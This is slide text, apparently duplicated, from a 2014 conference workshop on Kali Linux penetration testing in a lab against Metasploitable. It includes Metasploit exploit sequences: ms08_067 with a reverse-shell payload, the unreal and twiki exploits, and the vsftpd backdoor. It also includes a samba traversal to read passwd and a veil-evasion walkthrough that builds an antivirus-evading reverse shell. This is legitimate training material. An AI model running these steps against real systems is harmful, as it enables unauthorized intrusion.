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Kali Linux
Presentation on Kali Linux
Ohio HTCIA 2014 Spring Conference
Salt Fork Lodge
Welcome – Salt Fork 2014
Tony Godfrey is the CEO / Linux Consultant
of Falconer Technologies (est 2003) specializing in
Linux. He has written several articles on the body
of knowledge of security administration, is a
regular contributor to a variety of Linux
publications, and has written technical content for
Linux education nation-wide at the college level.
He also teaches topics covering Linux,
Network Security, Cisco routers, Cybercrime and
System Forensics.
Who or What is ‘Kali’?
Who is Kali?
Kali the mother goddess despite her
fearful appearance, protects the good
against the evil. Unlike the other Hindu
deities her form is pretty scary and
formidable, intended to scare away the
demons both literally and figuratively!
Anu Yadavalli
Hindu Kali
What is Kali Linux?
Kali Linux is a Debian-derived Linux
distribution designed for digital forensics
and penetration testing. It is maintained
and funded by Offensive Security Ltd. It
was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the
rewrite of BackTrack, their previous
forensics Linux distribution.
What’s on the DVD?
◦Official Kali Guide
◦7-Zip, kali_iso, SD_formatter, Unetbootin,
USB_installer, VMware, Win32_DiskImager
 We‟re going to type something
 We‟re going to make a note
 Might be a question?
 We‟re going to click on something
 Recon  Attack
Use your powers for good
Getting Ready…
- Let‟s make a folder called  kali_2014
- Copy the DVD contents into that folder
- Install 7-Zip
- Install VMware Player
Let‟s make sure the virtual environments are working and can „ping‟
each other
VMware Player
Press <CTRL><Alt> at the same time to
be released from the current virtual
environment. You can then do a normal
<Alt><Tab> to toggle between different
Logins / Passwords
Kali Login  root
Kali Password  password
Metaspolitable Login  msfadmin
Metaspolitable Password  msfadmin
Metaspolitable V/E
 Login  msfadmin
 Password  msfadmin
 ifconfig
 Jot down the IP & Netmask
 route
 Jot down the Gateway
Metaspolitable V/E
Virtual Environment #1
rlogin –l root <IP Address>
cd /tmp
ls -l ...vs... ls -la
rm .X0-lock
 startx
Kali V/E
 Login  root
 Password  password
 ifconfig
 Jot down the IP & Netmask
 route
 Jot down the Gateway
Kali V/E
Go to:
Applications  System Tools
 Preferences  System Settings
 Display  Resolution: ____
Kali Updating
From the command line, type 
apt-get update && apt-get upgrade
Note: This has already been done to save time, but should be done
after a new installation.
Are we good?
There are several categories
Top 10 Security Tools
Information Gathering
Vulnerability Analysis
Web Applications Password Attacks
Wireless Attacks Exploitation Tools
Sniffing/Spoofing Maintaining Access
Reverse Engineering
Stress Testing Hardware Hacking
Forensics Reporting Tools
System Services
Metapackages also exist
Command Line Tools
Presentation on Kali Linux
 ping
Packet InterNet Groper
Port = 8
Establishes physical connectivity between two entities
 (from Kali) ping <Target IP>
Did it echo back?
 top
Tells us what services are running,
processes, memory allocation
Basically, a live system monitor
 df
Tells us how much space is available
or „disk free‟
 du
Tells us how much space is taken or
„disk used‟.
You can get a shorter report by…
 „du –s‟ … (disk used –summary)
 free
How much „free‟ memory is available
 ls
This is for „list‟
 ls –l (list –long)
 ls -la (list – long – all attributes)
 pwd
Directory structure
Means „path to working directory‟ or
„print working directory‟
ps / ps aux / pstree
 ps
Means „Process Status‟
◦aux – auxiliary view
◦pstree – shows parent/child relationships
◦Windows – tasklist / taskkill
Kill - Stops a process (ex: kill PID)
Both Environments
Presentation on Kali Linux
Can you ‘ping’ each other?
Virtual Environment #1 (Metaspolitable)
◦…jot this number down…
Virtual Environment #2 (Kali)
◦…jot this number down…
CLI & Services
Presentation on Kali Linux
 traceroute
Essentially, „tracert‟ in Windows
 traceroute –i eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets
across an Internet Protocol (IP) network
nmap –p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
nmap –sS –Pn –A <Target IP>
A security scanner used to discover hosts and services on a
computer network – „sS‟ is stealth scan, „Pn‟ not to run a ping scan,
and „A‟ is O/S detection, services, service pack.
rlogin (from Metaspolitable)
 rlogin –l root <Target IP>
 whoami
 tcpdump -i eth0 host <Target IP>
A packet analyzer that runs under the command line. It allows the
user to intercept and display TCP/IP and other packets being
transmitted or received over a network to which the computer is
rpcinfo –p <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
 showmount –e <Target IP>
 showmount –a <Target IP>
It displays a list of all clients that have remotely mounted a file system from a
specified machine in the Host parameter. This information is maintained by
the [mountd] daemon on the Host parameter.
 telnet <Target IP> 21
After '220...'
 user backdoored:)
 <CTRL><]>
 quit
Port 20/21 is FTP
 telnet <Target IP> 6200
After 'Escape character...',
 id;
 quit
Port 6200 - Oracle Notification Service remote port Oracle Application Server
 telnet <Target IP> 6667
IRC (Internet Relay Chat)
Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP,
Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan,
Vampire, Moses, Maniacrootkit, kaitex, EGO.
 telnet <Target IP> 1524
After 'root@meta....',
 id
Many attack scripts install a backdoor shell at this port (especially those
against Sun systems via holes in sendmail and RPC services like statd,
ttdbserver, and cmsd). Connections to port 600/pcserver also have this
problem. Note: ingreslock, Trinoo; talks UDP/TCP.
Are we good?
 smbclient –L <//Target IP>
 msfconsole
...wait, wait, wait..., then
use auxiliary/admin/smb/samba_symlink_traversal
 set RHOST <Target IP>
 set SMBSHARE tmp
 exploit
...Connecting to the server.....
...<yadda, yadda, yadda>...
...Auxiliary module....
At the prompt, type  exit
 smbclient //<Target IP>/tmp
Do you get the 'smb: >' prompt?
 cd rootfs
 cd etc
 more passwd
Do you get a list of all user accts?
On Kali…
tcpdump –I eth0 src <Target IP>
On Metaspolitable…
open a Browser & go to
On Kali
netdiscover –i eth0 –r <Target IP>/24
Netdiscover is an active/passive address reconnaissance tool, mainly
developed for those wireless networks without DHCP server, when you are
wardriving. It can be also used on hub/switched networks.
On Kali
 nikto –h <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
On Kali
sqlmap –u http://<Target IP> --dbs
It is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database
Wasp Services
From Kali – open IceWeasel
 http://<Target IP>/
Research: Multillidae <p. 8>
The Mutillidae are a family of more than 3,000 species of wasps (despite the
names) whose wingless females resemble large, hairy ants. Their common
name ‘velvet ant’ refers to their dense pile of hair which most often is bright
scarlet or orange, but may also be black, white, silver, or gold.
Web Services
From Kali – open IceWeasel
 http://<Target IP>/
Research: Multillidae <p. 8>
Mutillidae is a free, open source web application provided to allow security
enthusiest to pen-test and hack a web application
From Kali
 whatweb <Target IP>
 whatweb –v <Target IP>
 whatweb –a 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
From Kali - msfconsole
Presentation on Kali Linux
From Kali
 service postgresql start
 service metasploit start
 msfconsole
Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole
We will then take a look at the built-in exploit tools
From [msf>] console
 help search
 show exploits
 search dns
‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in
exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
From [msf>] console
 search Microsoft
 search diablo
 search irc
 search http
Let’s try a few more to see what they do….
From [msf>] console, search for „unreal‟
 info <exploit>
 use <exploit>
 show options
From [msf>] console (ex: unreal)
 set RHOST <IP Address>
 show options
 exploit
From [msf>] console, search for „twiki‟
 info <exploit>
 use <exploit>
 show options
From [msf>] console (ex: „twiki‟)
 set RHOST <IP Address>
 show options
 exploit
From [msf>] console, (target: Win XP)
 use exploit/windows/smb/ms08_067_netapi
 show options
 show targets
 set target 2
From [msf>] console, (target: Win XP)
 show options
 show advanced
 show targets
 show payloads
From [msf>] console, (target: Win XP)
 set payload windows/shell_reverse_tcp
 show options
 set LHOST <Kali IP Address>
 set RHOST <Target IP Address>
From [msf>] console, (target: Win XP)
 show options
 exploit
 Any errors?
From Kali – more GUI
Presentation on Kali Linux
Let‟s run Zenmap
 Applications  Kali Linux
 Information Gathering
 DNS Analysis
 Zenmap
Let‟s run SHODAN
 Open a browser
 type in „almost anything‟
 …Be very nervous…
Let‟s run FERN
 Kali Linux
 Wireless Attacks
 Wireless Tools
 fern-wifi-cracker
Kali has many built-in tools, but you
can always install more (Debian-based).
But, you may always wish to add more
such as recon-ng.
automated info gathering and
network reconnaissance.
Let‟s run recon-ng…
 cd /opt/recon-ng
 /usr/bin/python recon-ng
 show modules
 recon/hosts/gather/http/web/google_site
Let‟s run recon-ng…
 set DOMAIN <>
 run (…let this run awhile…)
 back (…previous level…)
 show modules
Let‟s run recon-ng…
 use reporting/csv
 run
 Will add your new information to
If you want something more basic…dmitry
 dmitry –s <>
 It gives you site names & IP‟s
Kali has many built-in tools, but you
can always install even more (Debian-
based). You may always wish to add more
such as veil.
Remote shell payload generator
that can bypass many anti-virus
Let‟s run veil
 veil-evasion
 list (available payloads list)
 use 13 (powershell/VirtualAlloc)
 generate
Let‟s run veil
 1 (msfvenom)
 [ENTER] (accept default)
 Value for LHOST (Target IP)
 Value for LPORT (ex: 4000)
Let‟s run veil
 Output name (“Squatch”)
 It will store this new batch file to
the  /usr/share/veil/output/source
folder. When the file is run from the target
machine, it will attempt to do a reverse
shell session with Kali.
Final Thoughts…
Kali Information
See „Notes‟ section in this slide
Kali Comparisons
See „Notes‟ section in this slide
Kali-specific Websites
See „Notes‟ section in this slide
Kali Publications
See „Notes‟ section in this slide
But wait, that’s not all
Kali in a box?
Do you want to run Kali on tablet or phone?
Pentesting with Firefox?
The Firefox web browser is great tool to
test vulnerabilities of a website. There is a
portable version on PortableApps. I would
suggest this version and install the needed
plugins. Then, fire up the browser and „use
your powers for good‟.
Thank You
Thank you
Thank you for your time.
Falconer Technologies
877 / TUX RULZ or 877 / 889-7859

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Kali Linux - Falconer

  • 1. Kali Linux Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge
  • 2. Welcome – Salt Fork 2014
  • 3. Welcome Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.
  • 4. Who or What is ‘Kali’?
  • 5. Who is Kali? Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli
  • 7. What is Kali Linux? Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
  • 8. What’s on the DVD? /books ◦Official Kali Guide ◦eForensics /media ◦7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager /metaspolitable /PPT
  • 10.
  • 11. Legend  We‟re going to type something  We‟re going to make a note  Might be a question?  We‟re going to click on something  Recon  Attack
  • 13. Use your powers for good
  • 14. Getting Ready… - Let‟s make a folder called  kali_2014 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let‟s make sure the virtual environments are working and can „ping‟ each other
  • 15. VMware Player Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.
  • 16. Logins / Passwords Kali Login  root Kali Password  password Metaspolitable Login  msfadmin Metaspolitable Password  msfadmin
  • 17. Metaspolitable V/E  Login  msfadmin  Password  msfadmin  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
  • 18. Metaspolitable V/E Virtual Environment #1 ◦Metaspolitable  Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock  startx
  • 19. Kali V/E  Login  root  Password  password  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
  • 20. Kali V/E Go to: Applications  System Tools  Preferences  System Settings  Display  Resolution: ____ Then…[Apply]
  • 21. Kali Updating From the command line, type  apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation.
  • 23. There are several categories Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications Password Attacks Wireless Attacks Exploitation Tools Sniffing/Spoofing Maintaining Access Reverse Engineering Stress Testing Hardware Hacking Forensics Reporting Tools System Services
  • 26. ping  ping Packet InterNet Groper Port = 8 Establishes physical connectivity between two entities  (from Kali) ping <Target IP> Did it echo back?
  • 27. top  top Tells us what services are running, processes, memory allocation Basically, a live system monitor
  • 28. df  df Tells us how much space is available or „disk free‟
  • 29. du  du Tells us how much space is taken or „disk used‟. You can get a shorter report by…  „du –s‟ … (disk used –summary)
  • 30. free  free How much „free‟ memory is available
  • 31. ls  ls This is for „list‟  ls –l (list –long)  ls -la (list – long – all attributes)
  • 32. pwd  pwd Directory structure Means „path to working directory‟ or „print working directory‟
  • 33. ps / ps aux / pstree  ps Means „Process Status‟ ◦aux – auxiliary view ◦pstree – shows parent/child relationships ◦Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID)
  • 35. Can you ‘ping’ each other? Virtual Environment #1 (Metaspolitable) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down… Virtual Environment #2 (Kali) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down…
  • 37. traceroute  traceroute Essentially, „tracert‟ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network
  • 38. nmap  nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network
  • 39. nmap  nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – „sS‟ is stealth scan, „Pn‟ not to run a ping scan, and „A‟ is O/S detection, services, service pack.
  • 40. rlogin (from Metaspolitable)  rlogin –l root <Target IP>  whoami  tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
  • 41. rpcinfo  rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.
  • 42. showmount  showmount –e <Target IP>  showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.
  • 43. telnet  telnet <Target IP> 21 After '220...'  user backdoored:)  <CTRL><]>  quit Port 20/21 is FTP
  • 44. telnet  telnet <Target IP> 6200 After 'Escape character...',  id; <CTRL><]>  quit Port 6200 - Oracle Notification Service remote port Oracle Application Server
  • 45. telnet  telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.
  • 46. telnet  telnet <Target IP> 1524 After 'root@meta....',  id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
  • 48. smbclient  smbclient –L <//Target IP>  msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal  set RHOST <Target IP>  set SMBSHARE tmp
  • 49. smbclient  exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type  exit
  • 50. smbclient  smbclient //<Target IP>/tmp Do you get the 'smb: >' prompt?  cd rootfs  cd etc  more passwd Do you get a list of all user accts?
  • 51. tcpdump On Kali… tcpdump –I eth0 src <Target IP> On Metaspolitable… ping open a Browser & go to
  • 52. netdiscover On Kali netdiscover –i eth0 –r <Target IP>/24 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.
  • 53. nikto On Kali  nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.
  • 54. sqlmap On Kali sqlmap –u http://<Target IP> --dbs It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
  • 55. Wasp Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.
  • 56. Web Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application
  • 57. whatweb From Kali  whatweb <Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
  • 58. From Kali - msfconsole Presentation on Kali Linux
  • 59. msfconsole From Kali  service postgresql start  service metasploit start  msfconsole Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole We will then take a look at the built-in exploit tools
  • 60. msfconsole From [msf>] console  help search  show exploits  search dns ‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
  • 61. msfconsole From [msf>] console  search Microsoft  search diablo  search irc  search http Let’s try a few more to see what they do….
  • 62. msfconsole From [msf>] console, search for „unreal‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
  • 63. msfconsole From [msf>] console (ex: unreal)  set RHOST <IP Address>  show options  exploit 
  • 64. msfconsole From [msf>] console, search for „twiki‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
  • 65. msfconsole From [msf>] console (ex: „twiki‟)  set RHOST <IP Address>  show options  exploit 
  • 66. msfconsole From [msf>] console, (target: Win XP)  use exploit/windows/smb/ms08_067_netapi  show options  show targets  set target 2
  • 67. msfconsole From [msf>] console, (target: Win XP)  show options  show advanced  show targets  show payloads
  • 68. msfconsole From [msf>] console, (target: Win XP)  set payload windows/shell_reverse_tcp  show options  set LHOST <Kali IP Address>  set RHOST <Target IP Address>
  • 69. msfconsole From [msf>] console, (target: Win XP)  show options  exploit  Any errors? 
  • 70. From Kali – more GUI Presentation on Kali Linux
  • 71. Zenmap Let‟s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap
  • 72. SHODAN Let‟s run SHODAN  Open a browser   type in „almost anything‟  …Be very nervous…
  • 73. FERN Let‟s run FERN  Kali Linux  Wireless Attacks  Wireless Tools  fern-wifi-cracker
  • 74. recon-ng Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng. recon-ng automated info gathering and network reconnaissance.
  • 75. recon-ng Let‟s run recon-ng…  cd /opt/recon-ng  /usr/bin/python recon-ng  show modules  recon/hosts/gather/http/web/google_site
  • 76. recon-ng Let‟s run recon-ng…  set DOMAIN <>  run (…let this run awhile…)  back (…previous level…)  show modules
  • 77. recon-ng Let‟s run recon-ng…  use reporting/csv  run  Will add your new information to /usr/share/recon-ng/workspaces/default
  • 78. dmitry If you want something more basic…dmitry  dmitry –s <>  It gives you site names & IP‟s
  • 79. veil Kali has many built-in tools, but you can always install even more (Debian- based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.
  • 80. veil Let‟s run veil  veil-evasion  list (available payloads list)  use 13 (powershell/VirtualAlloc)  generate
  • 81. veil Let‟s run veil  1 (msfvenom)  [ENTER] (accept default)  Value for LHOST (Target IP)  Value for LPORT (ex: 4000)
  • 82. veil Let‟s run veil  Output name (“Squatch”)  It will store this new batch file to the  /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.
  • 84. Kali Information See „Notes‟ section in this slide
  • 85. Kali Comparisons See „Notes‟ section in this slide
  • 86. Kali-specific Websites See „Notes‟ section in this slide
  • 87. Kali Publications See „Notes‟ section in this slide
  • 90. Kali in a box? Do you want to run Kali on tablet or phone?
  • 91. Pentesting with Firefox? The Firefox web browser is great tool to test vulnerabilities of a website. There is a portable version on PortableApps. I would suggest this version and install the needed plugins. Then, fire up the browser and „use your powers for good‟.
  • 93. Thank you Thank you for your time. Falconer Technologies 877 / TUX RULZ or 877 / 889-7859

Editor's Notes

  1. Presentation on Kali LinuxTGodfrey – Falconer TechnologiesOhio HTCIA – Salt Fork conference – 5/2014